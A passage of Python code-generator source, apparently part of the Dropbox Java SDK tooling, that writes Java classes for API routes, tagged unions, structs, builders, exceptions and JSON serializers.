return w.fmt('new %s("%s", %s.getRequestId(), %s.getUserMessage(), (%s) %s.getErrorValue());',
j.route_exception_class(route),
j.url_path(route),
error_wrapper_var,
error_wrapper_var,
j.java_class(route.error_data_type),
error_wrapper_var)
else:
message = '"Unexpected error response for \\"{}\\":" + {}.getErrorValue()'.format(
format_func_name(route),
error_wrapper_var,
)
return 'new DbxApiException({}.getRequestId(), {}.getUserMessage(), {});'.format(
error_wrapper_var,
error_wrapper_var,
message)
def generate_route_simple_call(self, route, arg_var, before, *other_args):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
with w.block('try'):
multiline_args = [
'this.client.getHost().%s()' % camelcase('get_' + j.route_host(route)),
'"%s"' % j.url_path(route),
arg_var if j.has_arg(route) else 'null',
'true' if j.auth_style(route) == 'noauth' else 'false',
]
multiline_args.extend(other_args)
multiline_args.extend([
w.java_serializer(route.arg_data_type),
w.java_serializer(route.result_data_type),
w.java_serializer(route.error_data_type),
])
self.g.generate_multiline_list(
multiline_args,
before=before,
after=';',
)
with self.g.block('catch (DbxWrappedException ex)'):
w.out('throw %s' % self.translate_error_wrapper(route, 'ex'))
def generate_route_rpc_call(self, route, arg_var):
assert isinstance(route, ApiRoute), repr(route)
j = self.j
# return value is optional
before = ('return ' if j.has_result(route) else '') + 'this.client.rpcStyle'
self.generate_route_simple_call(
route,
arg_var,
before,
)
def generate_route_download_call(self, route, arg_var, headers_var):
assert isinstance(route, ApiRoute), repr(route)
# always need to return a downloader
before = 'return this.client.downloadStyle'
self.generate_route_simple_call(
route,
arg_var,
before,
headers_var,
)
def generate_route_upload_call(self, route, arg_var):
assert isinstance(route, ApiRoute), repr(route)
w = self.w
j = self.j
self.g.generate_multiline_list(
(
'this.client.getHost().%s()' % camelcase('get_' + j.route_host(route)),
'"%s"' % j.url_path(route),
arg_var if j.has_arg(route) else 'null',
'true' if j.auth_style(route) == 'noauth' else 'false',
w.java_serializer(route.arg_data_type),
),
before=w.fmt('%s _uploader = this.client.uploadStyle',
JavaClass('com.dropbox.core.http.HttpRequestor.Uploader')),
after=';',
)
w.out('return new %s(_uploader, this.client.getUserId());', j.route_uploader_class(route))
def generate_data_type(self, data_type):
"""Generate a class definition for a datatype (a struct or a union)."""
assert is_user_defined_type(data_type), repr(data_type)
j = self.j
if not self.g.args.data_types_only and not j.is_used_by_client(data_type):
return
with self.class_writer(data_type) as w:
w.importer.add_imports_for_data_type(data_type)
w.write_imports()
if j.is_enum(data_type):
self.generate_data_type_enum(data_type)
elif is_union_type(data_type):
self.generate_data_type_union(data_type)
elif is_struct_type(data_type):
self.generate_data_type_struct(data_type)
else:
raise AssertionError(repr(data_type))
# generate exception classes for routes if the data type is used as an error response
if j.data_type_has_exception(data_type):
self.generate_exception_type(data_type)
def generate_data_type_enum(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
assert j.is_enum(data_type), repr(data_type)
visibility = j.data_type_visibility(data_type)
w.out('')
w.javadoc(data_type)
with w.class_block(data_type, visibility=visibility):
w.out('// union %s (%s)', j.stone_fq_name(data_type), j.get_spec_filename(data_type))
self.generate_enum_values(data_type)
#
# Serialization
#
self.generate_union_serializer(data_type)
def generate_enum_values(self, data_type):
"""Generate enum values for simple unions or tags."""
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
last_index = len(data_type.all_fields) - 1
for i, field in enumerate(data_type.all_fields):
w.javadoc(field)
comment = ''
if field == data_type.catch_all_field:
assert is_void_type(field.data_type), repr(field)
comment = ' // *catch_all'
elif j.has_value(field):
comment = w.fmt(' // %s', j.java_class(field))
sep = ';' if i == last_index else ','
enum_value = j.field_enum_name(field) or j.field_tag_enum_name(field)
assert enum_value, repr(field)
w.out(enum_value + sep + comment)
def generate_data_type_union(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
class_doc = """{}
This class is {} union. Tagged unions instances are always associated to a
specific tag. This means only one of the {{@code isAbc()}} methods will return {{@code
true}}. You can use {{@link #tag()}} to determine the tag associated with this instance.
""".format(data_type.doc or '', 'an open tagged' if data_type.catch_all_field else 'a tagged')
if data_type.catch_all_field:
class_doc += """
Open unions may be extended in the future with additional tags. If a new tag is
introduced that this SDK does not recognized, the {@link #%s} value will be used.
""" % j.field_static_instance(data_type.catch_all_field)
visibility = j.data_type_visibility(data_type)
w.out('')
w.javadoc(class_doc, stone_elem=data_type)
with w.class_block(data_type, visibility=visibility):
w.out('// union %s (%s)', j.stone_fq_name(data_type), j.get_spec_filename(data_type))
#
# Tag
#
w.out('')
w.javadoc('Discriminating tag type for {@link %s}.' % j.java_class(data_type).name)
with w.block('public enum Tag'):
self.generate_enum_values(data_type)
#
# Simple field singletons
#
all_fields = data_type.all_fields
static_fields = [f for f in all_fields if is_void_type(f.data_type)]
value_fields = [f for f in all_fields if not is_void_type(f.data_type)]
if static_fields:
w.out('')
for field in static_fields:
singleton_args = ', '.join(["Tag.%s" % j.field_tag_enum_name(field)])
w.javadoc(field)
method_name = union_create_with_method_name(data_type, [])
w.out('public static final %s %s = new %s().%s(%s);',
j.java_class(data_type),
j.field_static_instance(field),
j.java_class(data_type),
method_name,
singleton_args,
)
#
# Instance fields
#
w.out('')
w.out('private Tag _tag;')
for field in all_fields:
if j.has_value(field):
w.out('private %s %s;', j.java_class(field, boxed=True), j.param_name(field))
#
# Constructors
#
w.out('')
w.javadoc('Private default constructor, so that object is uninitializable publicly.')
with w.block('private %s()', j.java_class(data_type)):
pass
w.out('')
def _gen_create_with_method(data_type, value_fields_subset):
w.out('')
w.javadoc(data_type,
fields=value_fields_subset,
params=OrderedDict(_tag="Discriminating tag for this instance."))
formatted_args = ', '.join(chain(
['Tag _tag'],
[
w.fmt('%s %s', j.java_class(f, boxed=True), j.param_name(f))
for f in value_fields_subset
],
))
method_name = union_create_with_method_name(data_type, value_fields_subset)
with w.block('private %s %s(%s)', j.java_class(data_type), method_name, formatted_args):
w.out('%s result = new %s();', j.java_class(data_type), j.java_class(data_type))
w.out('result._tag = _tag;')
for field in value_fields_subset:
# don't perform validation in the private constructor
w.out('result.%s = %s;', j.param_name(field), j.param_name(field))
w.out('return result;')
_gen_create_with_method(data_type, [])
for f in value_fields:
_gen_create_with_method(data_type, [f])
#
# Field getters/constructors
#
w.out('')
if data_type.catch_all_field:
catch_all_doc = (
"""
If a tag returned by the server is unrecognized by this SDK,
the {@link Tag#%s} value will be used.
""" % j.field_tag_enum_name(data_type.catch_all_field)
)
else:
catch_all_doc = ""
w.javadoc(
"""
Returns the tag for this instance.
This class is a tagged union. Tagged unions instances are always associated to a
specific tag. This means only one of the {{@code isXyz()}} methods will return {{@code
true}}. Callers are recommended to use the tag value in a {{@code switch}} statement to
properly handle the different values for this {{@code {}}}.
{}""".format(j.java_class(data_type).name, catch_all_doc),
stone_elem=data_type,
returns="the tag for this instance."
)
with w.block('public Tag tag()'):
w.out('return _tag;')
self.generate_data_type_union_field_methods(data_type)
#
# Helper methods
#
self.generate_hash_code(data_type)
self.generate_equals(data_type)
self.generate_to_string(data_type)
#
# Serialization
#
self.generate_union_serializer(data_type)
def generate_data_type_union_field_methods(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
value_fields = [f for f in data_type.all_fields if not is_void_type(f.data_type)]
for field in data_type.all_fields:
#
# isFieldName()
#
w.out('')
w.javadoc(
"""
Returns {@code true} if this instance has the tag {@link Tag#%s}, {@code false}
otherwise.
""" % j.field_tag_enum_name(field),
returns=(
"""
{@code true} if this instance is tagged as {@link Tag#%s},
{@code false} otherwise.
"""
) % j.field_tag_enum_name(field)
)
with w.block('public boolean %s()' % j.field_tag_match_method_name(field)):
w.out('return this._tag == Tag.%s;', j.field_tag_enum_name(field))
if j.has_value(field):
#
# Union fieldName() [factory method]
#
w.out('')
doc = (
"""
Returns an instance of {{@code {}}} that has its tag set to {{@link Tag#{}}}.
{}
""".format(j.java_class(data_type).name, j.field_tag_enum_name(field), field.doc)
)
returns = "Instance of {{@code {}}} with its tag set to {{@link Tag#{}}}.".format(
j.java_class(data_type).name, j.field_tag_enum_name(field))
w.javadoc(
doc,
stone_elem=field,
params=OrderedDict(value="value to assign to this instance.") if j.has_value(field) else (),
returns=returns,
throws=w.throws(field, "value"),
)
if j.has_value(field):
with w.block('public static %s %s(%s value)',
j.java_class(data_type),
j.field_factory_method(field),
j.java_class(field),
):
self.generate_field_validation(field, value_name="value", omit_arg_name=True,
allow_default=False)
method_name = union_create_with_method_name(data_type, [field])
w.out('return new %s().%s(Tag.%s, %s);',
j.java_class(data_type),
method_name,
j.field_tag_enum_name(field),
"value")
if is_nullable_type(field.data_type):
w.out('')
w.javadoc(doc, stone_elem=field, returns=returns)
with w.block('public static %s %s()', j.java_class(data_type), j.field_factory_method(field)):
w.out('return %s(null);', j.field_factory_method(field))
#
# getFieldNameValue()
#
w.out('')
w.javadoc(
"""
{}
This instance must be tagged as {{@link Tag#{}}}.
""".format(field.doc or '', j.field_tag_enum_name(field)),
stone_elem=field,
returns="""
The {} value associated with this instance if {{@link #{}}} is
{{@code true}}.
""".format(w.javadoc_ref(field.data_type), j.field_tag_match_method_name(field)),
throws=OrderedDict(
IllegalStateException="If {@link #%s} is {@code false}." % j.field_tag_match_method_name(field),
)
)
with w.block('public %s %s()', j.java_class(field), j.field_getter_method(field)):
with w.block('if (this._tag != Tag.%s)', j.field_tag_enum_name(field)):
w.out(
'throw new IllegalStateException("Invalid tag: required Tag.%s, but was Tag." + this._tag.name());',
j.field_tag_enum_name(field))
w.out('return %s;', j.param_name(field))
def generate_data_type_struct(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
visibility = j.data_type_visibility(data_type)
w.out('')
w.javadoc(data_type)
with w.class_block(data_type, visibility=visibility):
w.out('// struct %s (%s)', j.stone_fq_name(data_type), j.get_spec_filename(data_type))
#
# instance fields
#
w.out('')
for field in data_type.fields:
# fields marked as protected since structs allow inheritance
w.out('protected final %s %s;', j.java_class(field), j.param_name(field))
#
# constructor.
#
# use builder or required-only constructor for default values
args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f))
for f in data_type.all_fields
)
doc = data_type.doc or ''
if j.has_builder(data_type):
doc += """
Use {@link newBuilder} to create instances of this class without specifying values for all optional fields.
"""
w.out('')
w.javadoc(doc, stone_elem=data_type, fields=data_type.all_fields, allow_defaults=False)
with w.block('public %s(%s)', j.java_class(data_type), args):
parent_fields = data_type.parent_type.all_fields if data_type.parent_type else ()
if parent_fields:
parent_args = ', '.join(j.param_name(f) for f in parent_fields)
w.out('super(%s);', parent_args)
for field in data_type.fields:
self.generate_field_validation(field, allow_default=False)
self.generate_field_assignment(field, allow_default=False)
# required-only constructor
if data_type.all_optional_fields:
# create a constructor with just required fields (for convenience)
required_fields = data_type.all_required_fields
required_args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f))
for f in required_fields
)
w.out('')
w.javadoc(
"""
%s
The default values for unset fields will be used.
""" % data_type.doc or '',
stone_elem=data_type,
fields=required_fields,
)
with w.block('public %s(%s)', j.java_class(data_type), required_args):
this_args = []
for field in data_type.all_fields:
if is_nullable_type(field.data_type):
this_args.append('null')
elif field.has_default:
this_args.append(w.java_default_value(field))
else:
this_args.append(j.param_name(field))
w.out('this(%s);', ', '.join(this_args))
#
# getter methods
#
for field in data_type.all_fields:
w.out('')
if field in data_type.all_optional_fields:
returns = 'value for this field, or {@code null} if not present.'
elif j.is_java_primitive(field.data_type):
returns = 'value for this field.'
else:
returns = 'value for this field, never {@code null}.'
if field.has_default:
returns += ' Defaults to %s.' % w.java_default_value(field)
w.javadoc(field.doc or '', stone_elem=field, returns=returns)
with w.block('public %s %s()', j.java_class(field), j.field_getter_method(field)):
w.out('return %s;' % j.param_name(field))
#
# builder
#
if j.has_builder(data_type):
self.generate_struct_builder(data_type)
#
# Helper methods
#
self.generate_hash_code(data_type)
self.generate_equals(data_type)
self.generate_to_string(data_type)
#
# Serialization
#
self.generate_struct_serializer(data_type)
def generate_struct_builder(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
assert j.has_builder(data_type), repr(data_type)
parent_has_builder = data_type.parent_type and j.has_builder(data_type.parent_type)
all_required_fields = data_type.all_required_fields
fields = data_type.fields if parent_has_builder else data_type.all_fields
required_fields = [f for f in fields if f in all_required_fields]
optional_fields = [f for f in fields if f not in all_required_fields]
ancestors = get_ancestors(data_type)
all_required_args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in all_required_fields
)
required_args = ', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in required_fields
)
w.out('')
w.javadoc(
'Returns a new builder for creating an instance of this class.',
stone_elem=data_type,
fields=all_required_fields,
returns='builder for this class.',
)
with w.block('public static %s newBuilder(%s)', j.builder_class(data_type), all_required_args):
builder_args = ', '.join(j.param_name(f) for f in all_required_fields)
w.out('return new %s(%s);', j.builder_class(data_type), builder_args)
parent_class = None
if data_type.parent_type and j.has_builder(data_type.parent_type):
parent_class = j.builder_class(data_type.parent_type)
w.out('')
w.javadoc('Builder for %s.' % w.javadoc_ref(data_type))
with w.class_block(j.builder_class(data_type), parent_class=parent_class):
#
# Instance fields
#
for field in required_fields:
w.out('protected final %s %s;', j.java_class(field), j.param_name(field))
if optional_fields:
w.out('')
for field in optional_fields:
w.out('protected %s %s;', j.java_class(field), j.param_name(field))
#
# Constructor
#
w.out('')
with w.block('protected %s(%s)', j.builder_class(data_type), all_required_args):
if parent_has_builder:
parent_required_fields = [
f for f in data_type.parent_type.all_fields if f in all_required_fields
]
if parent_required_fields:
parent_args = ', '.join(j.param_name(f) for f in parent_required_fields)
w.out('super(%s);', parent_args)
for field in required_fields:
self.generate_field_validation(field)
self.generate_field_assignment(field)
for field in optional_fields:
if is_nullable_type(field.data_type):
w.out('this.%s = null;', j.param_name(field))
else:
assert field.has_default, repr(field)
w.out('this.%s = %s;', j.param_name(field), w.java_default_value(field))
#
# Setter/Adder methods
#
self.generate_builder_methods(j.builder_class(data_type), fields)
# delegate to parent builder, but make sure we return ourselves for proper chaining
if parent_has_builder:
self.generate_builder_methods(j.builder_class(data_type),
data_type.parent_type.all_fields,
wrapped_builder_name="super")
#
# Build method
#
w.out('')
w.javadoc(
"""
Builds an instance of %s configured with this builder's values
""" % w.javadoc_ref(data_type),
returns='new instance of %s' % w.javadoc_ref(data_type)
)
with w.block('public %s build()', j.java_class(data_type)):
build_args = ', '.join(j.param_name(f) for f in data_type.all_fields)
w.out('return new %s(%s);', j.java_class(data_type), build_args)
def generate_builder_methods(self, builder_class, fields, wrapped_builder_name=None):
assert isinstance(builder_class, JavaClass), repr(builder_class)
assert isinstance(fields, Sequence), repr(fields)
assert all(isinstance(f, StructField) for f in fields), repr(fields)
w = self.w
j = self.j
# qualify builder name if necessary to avoid name conflicts
if wrapped_builder_name and wrapped_builder_name != 'super':
wrapped_builder_name = 'this.' + wrapped_builder_name
for field in fields:
containing_data_type = j.field_containing_data_type(field)
if not field in containing_data_type.all_optional_fields:
continue
doc = 'Set value for optional field.'
if field.has_default:
doc += """
If left unset or set to {@code null}, defaults to {@code %s}.
""" % w.java_default_value(field)
#
# withFieldName(FieldType fieldValue);
#
w.out('')
w.javadoc(doc, stone_elem=field, fields=(field,), returns='this builder')
with w.block('public %s %s(%s %s)',
builder_class,
j.field_builder_method(field),
j.java_class(field, boxed=True), # null treated as default
j.param_name(field)):
if wrapped_builder_name:
w.out('%s.%s(%s);',
wrapped_builder_name,
j.field_builder_method(field),
j.param_name(field))
else:
self.generate_field_validation(field)
self.generate_field_assignment(field)
w.out('return this;')
def generate_exception_type(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
j = self.j
exception_class = j.exception_class(data_type)
data_type_ref = self.refs.data_type(data_type)
route_refs = [
ref for ref in self.refs.routes.values()
if ref.error_ref == data_type_ref
]
with self.class_writer(exception_class) as w:
w.importer.add_imports_for_exception_type(data_type)
w.write_imports()
route_javadoc_refs = oxford_comma_list([w.javadoc_ref(r) for r in route_refs])
w.out('')
w.javadoc(
"""
Exception thrown when the server responds with a {} error.
This exception is raised by {}.
""".format(w.javadoc_ref(data_type), route_javadoc_refs)
)
with w.class_block(exception_class, parent_class=JavaClass('com.dropbox.core.DbxApiException')):
w.out('// exception for routes:')
for route_ref in route_refs:
w.out('// %s', route_ref.url_path)
w.out('')
w.out('private static final long serialVersionUID = 0L;')
w.out('')
w.javadoc('The error reported by %s.' % route_javadoc_refs)
w.out('public final %s errorValue;', j.java_class(data_type))
w.out('')
with w.block('public %s(String routeName, String requestId, LocalizedText userMessage, %s errorValue)',
exception_class, j.java_class(data_type)):
w.out('super(requestId, userMessage, buildMessage(routeName, userMessage, errorValue));')
with w.block('if (errorValue == null)'):
w.out('throw new NullPointerException("errorValue");')
w.out('this.errorValue = errorValue;')
def generate_route_uploader(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self.j
assert j.request_style(route) == 'upload'
with self.class_writer(j.route_uploader_class(route)) as w:
w.importer.add_imports_for_route_uploader(route)
w.write_imports()
result_class = j.java_class(route.result_data_type, boxed=True)
error_class = j.java_class(route.error_data_type, boxed=True)
exception_class = j.route_exception_class(route)
parent_class = JavaClass('com.dropbox.core.DbxUploader',
generics=(result_class, error_class, exception_class))
w.out('')
w.javadoc(
"""
The {{@link DbxUploader}} returned by {}.
Use this class to upload data to the server and complete the request.
This class should be properly closed after use to prevent resource leaks and allow
network connection reuse. Always call {{@link #close}} when complete (see {}
for examples).
""".format(w.javadoc_ref(route), w.javadoc_ref(JavaClass('com.dropbox.core.DbxUploader')))
)
with w.class_block(j.route_uploader_class(route), parent_class=parent_class):
w.out('')
w.javadoc(
'Creates a new instance of this uploader.',
params=(('httpUploader', 'Initiated HTTP upload request'),),
throws=(('NullPointerException', 'if {@code httpUploader} is {@code null}'),)
)
with w.block('public %s(HttpRequestor.Uploader httpUploader, String userId)',
j.route_uploader_class(route)):
w.out('super(httpUploader, %s, %s, userId);',
w.java_serializer(route.result_data_type),
w.java_serializer(route.error_data_type))
w.out('')
with w.block('protected %s newException(DbxWrappedException error)', exception_class):
w.out('return %s', self.translate_error_wrapper(route, 'error'))
def generate_route_builder(self, route):
assert isinstance(route, ApiRoute), repr(route)
j = self.j
assert j.has_builder(route), repr(route)
arg = route.arg_data_type
with self.class_writer(j.builder_class(route)) as w:
result_class = j.java_class(route.result_data_type, boxed=True)
error_class = j.java_class(route.error_data_type, boxed=True)
exception_class = j.route_exception_class(route)
if j.request_style(route) == 'upload':
parent_class = JavaClass('com.dropbox.core.v2.DbxUploadStyleBuilder',
generics=(result_class, error_class, exception_class))
return_class = j.route_uploader_class(route)
elif j.request_style(route) == 'download':
parent_class = JavaClass('com.dropbox.core.v2.DbxDownloadStyleBuilder',
generics=(result_class,))
return_class = j.route_downloader_class(route)
elif j.has_result(route):
parent_class = None
return_class = j.java_class(route.result_data_type)
else:
parent_class = None
return_class = JavaClass('void')
w.importer.add_imports_for_route_builder(route)
w.write_imports()
w.out('')
w.javadoc(
"""
The request builder returned by %s.
Use this class to set optional request parameters and complete the request.
""" % w.javadoc_ref(route, builder=True)
)
with w.class_block(j.builder_class(route), parent_class=parent_class):
w.out('private final %s _client;', j.java_class(route))
if j.has_builder(arg):
w.out('private final %s _builder;', j.builder_class(arg))
else:
for f in arg.all_required_fields:
w.out('private final %s %s;', j.java_class(f), j.param_name(f))
for f in arg.all_optional_fields:
w.out('private %s %s;', j.java_class(f), j.param_name(f))
#
# CONSTRUCTOR
#
params = [
('_client',
'Dropbox namespace-specific client used to issue %s requests.' % j.route_namespace(route).name)
]
if j.has_builder(arg):
fields = ()
args = w.fmt('%s _client, %s _builder', j.java_class(route), j.builder_class(arg))
params.append(('_builder', 'Request argument builder.'))
else:
fields = arg.all_required_fields
args = w.fmt('%s _client, %s',
j.java_class(route),
', '.join(
w.fmt('%s %s', j.java_class(f), j.param_name(f)) for f in fields
))
w.out('')
w.javadoc(
'Creates a new instance of this builder.',
params=params,
fields=fields,
returns='instsance of this builder',
)
# package private
with w.block('%s(%s)', j.builder_class(route), args):
with w.block('if (_client == null)'):
w.out('throw new NullPointerException("_client");')
w.out('this._client = _client;')
if j.has_builder(arg):
with w.block('if (_builder == null)'):
w.out('throw new NullPointerException("_builder");')
w.out('this._builder = _builder;')
else:
for field in fields:
w.out('this.%s = %s;', j.param_name(field), j.param_name(field))
for field in arg.all_optional_fields:
if field.has_default:
w.out('this.%s = %s;', j.param_name(field), w.java_default_value(field))
else:
w.out('this.%s = null;', j.param_name(field))
#
# SETTERS/ADDERs for optional/list fields
#
wrapped_builder_name = '_builder' if j.has_builder(arg) else None
self.generate_builder_methods(j.builder_class(route), arg.all_fields,
wrapped_builder_name=wrapped_builder_name)
#
# BUILD method to start request
#
w.out('')
if j.request_style(route) in ('download', 'upload'):
w.out('@Override')
# inehrit doc from parent
else:
w.javadoc('Issues the request.')
if route.deprecated is not None:
w.out('@SuppressWarnings("deprecation")')
with w.block('public %s start() throws %s, DbxException',
return_class, exception_class):
if j.has_builder(arg):
w.out('%s arg_ = this._builder.build();', j.java_class(arg))
else:
w.out('%s arg_ = new %s(%s);',
j.java_class(arg),
j.java_class(arg),
', '.join(j.param_name(f) for f in arg.all_fields))
args = ['arg_']
if j.request_style(route) == 'download':
args.append('getHeaders()')
if j.has_result(route) or j.request_style(route) in ('upload', 'download'):
w.out('return _client.%s(%s);', j.route_method(route), ', '.join(args))
else:
w.out('_client.%s(%s);', j.route_method(route), ', '.join(args))
def generate_field_assignment(self, field, lhs=None, rhs=None, allow_default=True):
assert isinstance(field, Field), repr(field)
w = self.w
j = self.j
lhs = lhs or ('this.%s' % j.param_name(field))
rhs = rhs or j.param_name(field)
underlying_data_type = get_underlying_type(field.data_type)
# our timestamp format only allows for second-level granularity (no millis).
# enforce this.
#
# TODO: gotta be a better way than this...
if is_timestamp_type(underlying_data_type) and rhs != 'null':
rhs = w.fmt('%s.truncateMillis(%s)', JavaClass('com.dropbox.core.util.LangUtil'), rhs)
if allow_default and field.has_default:
java_default_value = w.java_default_value(field)
if rhs == 'null':
w.out('%s = %s;', lhs, java_default_value)
else:
with w.block('if (%s != null)', rhs):
w.out('%s = %s;', lhs, rhs)
with w.block('else'):
# set default
w.out('%s = %s;', lhs, java_default_value)
else:
w.out('%s = %s;', lhs, rhs)
def generate_field_validation(self, field, value_name=None, omit_arg_name=False, allow_default=True):
"""Generate validation code for one field.
"""
assert isinstance(field, Field), repr(field)
w = self.w
j = self.j
data_type = field.data_type
value_name = value_name or j.param_name(field)
if is_void_type(field.data_type):
return
elif is_nullable_type(field.data_type):
data_type = data_type.data_type
if j.requires_validation(data_type):
with w.block('if (%s != null)', j.param_name(field)):
self.generate_data_type_validation(data_type, value_name, omit_arg_name=omit_arg_name)
else:
# Don't need to check primitive/default types for null.
if not (j.is_java_primitive(field.data_type) or (allow_default and field.has_default)):
with w.block('if (%s == null)' % value_name):
if omit_arg_name:
w.out('throw new IllegalArgumentException("Value is null");')
else:
w.out('throw new IllegalArgumentException("Required value for \'%s\' is null");', value_name)
self.generate_data_type_validation(data_type, value_name, omit_arg_name=omit_arg_name)
# T95586: Because Android has a bug that forces all classes with RUNTIME annotations into the
# primary dex, we cannot use annotation-based serialization. If we do, then every POJO will be
# added to a multidex app's primary dex, potentially exceeding the method count limit.
#
# The solution is to generate the serialization code for every POJO. Note that from a
# performance and maintenance standpoint, this is not ideal.
#
# The dalvik bug is tracked here: https://code.google.com/p/android/issues/detail?id=78144
def generate_struct_serializer(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
visibility = j.serializer_visibility(data_type)
parent_class = JavaClass('com.dropbox.core.stone.StructSerializer',
generics=[j.java_class(data_type)])
w.out('')
w.javadoc("For internal use only.")
with w.class_block(j.serializer_class(data_type), visibility=visibility, parent_class=parent_class):
w.out('public static final %s INSTANCE = new %s();',
j.serializer_class(data_type),
j.serializer_class(data_type))
self.generate_struct_serialize(data_type)
self.generate_struct_deserialize(data_type)
def generate_union_serializer(self, data_type):
assert isinstance(data_type, DataType), repr(data_type)
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
visibility = j.serializer_visibility(data_type)
parent_class = JavaClass('com.dropbox.core.stone.UnionSerializer',
generics=[j.java_class(data_type)])
w.out('')
w.javadoc("For internal use only.")
with w.class_block(j.serializer_class(data_type), visibility=visibility, parent_class=parent_class):
w.out('public static final %s INSTANCE = new %s();',
j.serializer_class(data_type),
j.serializer_class(data_type))
self.generate_union_serialize(data_type)
self.generate_union_deserialize(data_type)
def generate_struct_serialize(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block(
'public void serialize(%s value, JsonGenerator g, boolean collapse) throws IOException, JsonGenerationException',
j.java_class(data_type)):
if data_type.has_enumerated_subtypes():
for subtype in data_type.get_enumerated_subtypes():
subtype_serializer = w.java_serializer(subtype.data_type)
with w.block('if (value instanceof %s)', j.java_class(subtype)):
w.out('%s.serialize((%s) value, g, collapse);',
subtype_serializer,
j.java_class(subtype))
w.out('return;')
with w.block('if (!collapse)'):
w.out('g.writeStartObject();')
ancestors = get_ancestors(data_type)
tag = '.'.join(name for name, _ in ancestors[1:] if name)
if tag:
w.out('writeTag("%s", g);' % tag)
for field in data_type.all_fields:
field_serializer = w.java_serializer(field.data_type)
field_value = 'value.%s' % j.param_name(field)
with w.conditional_block(is_nullable_type(field.data_type), 'if (%s != null)', field_value):
w.out('g.writeFieldName("%s");', field.name)
w.out('%s.serialize(%s, g);', field_serializer, field_value)
with w.block('if (!collapse)'):
w.out('g.writeEndObject();')
def generate_struct_deserialize(self, data_type):
assert is_struct_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public %s deserialize(JsonParser p, boolean collapsed) throws IOException, JsonParseException',
j.java_class(data_type)):
w.out('%s value;', j.java_class(data_type))
w.out('String tag = null;')
with w.block('if (!collapsed)'):
w.out('expectStartObject(p);')
w.out('tag = readTag(p);')
if data_type.is_member_of_enumerated_subtypes_tree():
ancestors = get_ancestors(data_type)
expected_tag = '.'.join(name for name, _ in ancestors if name)
with w.block('if ("%s".equals(tag))' % expected_tag):
w.out('tag = null;')
with w.block('if (tag == null)'):
for field in data_type.all_fields:
default_value = w.java_default_value(field) if field.has_default else 'null'
w.out('%s f_%s = %s;',
j.java_class(field, boxed=True), j.param_name(field), default_value)
if data_type.all_fields:
with w.block('while (p.getCurrentToken() == JsonToken.FIELD_NAME)'):
w.out('String field = p.getCurrentName();')
w.out('p.nextToken();')
for i, field in enumerate(data_type.all_fields):
conditional = 'if' if i == 0 else 'else if'
serializer = w.java_serializer(field.data_type)
with w.block('%s ("%s".equals(field))', conditional, field.name):
w.out('f_%s = %s.deserialize(p);', j.param_name(field), serializer)
with w.block('else'):
w.out('skipValue(p);')
for field in data_type.all_fields:
if field not in data_type.all_optional_fields:
with w.block('if (f_%s == null)', j.param_name(field)):
w.out('throw new JsonParseException(p, "Required field \\"%s\\" missing.");', field.name)
args = ['f_%s' % j.param_name(f) for f in data_type.all_fields]
w.out('value = new %s(%s);', j.java_class(data_type), ', '.join(args))
for tag, subtype_dt in get_enumerated_subtypes_recursively(data_type):
with w.block('else if ("%s".equals(tag))', tag):
w.out('value = %s.deserialize(p, true);', w.java_serializer(subtype_dt))
with w.block('else'):
w.out('throw new JsonParseException(p, "No subtype found that matches tag: \\"" + tag + "\\"");')
with w.block('if (!collapsed)'):
w.out('expectEndObject(p);')
w.out('StoneDeserializerLogger.log(value, value.toStringMultiline());')
w.out('return value;')
def generate_union_serialize(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public void serialize(%s value, JsonGenerator g) throws IOException, JsonGenerationException',
j.java_class(data_type)):
tag = 'value' if j.is_enum(data_type) else 'value.tag()'
with w.block('switch (%s)' % tag):
for field in data_type.all_fields:
if field == data_type.catch_all_field:
continue
with w.block('case %s:', j.field_tag_enum_name(field)):
if is_void_type(field.data_type):
w.out('g.writeString("%s");', field.name)
else:
w.out('g.writeStartObject();')
w.out('writeTag("%s", g);', field.name)
serializer = w.java_serializer(field.data_type)
value = 'value.%s' % j.param_name(field)
if j.is_collapsible(field.data_type) or is_nullable_type(
field.data_type) and j.is_collapsible(field.data_type.data_type):
w.out('%s.serialize(%s, g, true);', serializer, value)
else:
w.out('g.writeFieldName("%s");', field.name)
w.out('%s.serialize(%s, g);', serializer, value)
w.out('g.writeEndObject();')
w.out('break;')
with w.block('default:'):
if data_type.catch_all_field:
w.out('g.writeString("%s");', data_type.catch_all_field.name)
else:
w.out('throw new IllegalArgumentException("Unrecognized tag: " + %s);', tag)
def generate_union_deserialize(self, data_type):
assert is_union_type(data_type), repr(data_type)
w = self.w
j = self.j
w.out('')
w.out('@Override')
with w.block('public %s deserialize(JsonParser p) throws IOException, JsonParseException',
j.java_class(data_type)):
w.out('%s value;', j.java_class(data_type))
w.out('boolean collapsed;')
w.out('String tag;')
with w.block('if (p.getCurrentToken() == JsonToken.VALUE_STRING)'):
w.out('collapsed = true;')
w.out('tag = getStringValue(p);')
w.out('p.nextToken();')
with w.block('else'):
w.out('collapsed = false;')
w.out('expectStartObject(p);')
w.out('tag = readTag(p);')
with w.block('if (tag == null)'):
w.out('throw new JsonParseException(p, "Required field missing: " + TAG_FIELD);')
for field in data_type.all_fields:
if field == data_type.catch_all_field:
continue
field_dt = field.data_type
with w.block('else if ("%s".equals(tag))', field.name):
if is_void_type(field.data_type):
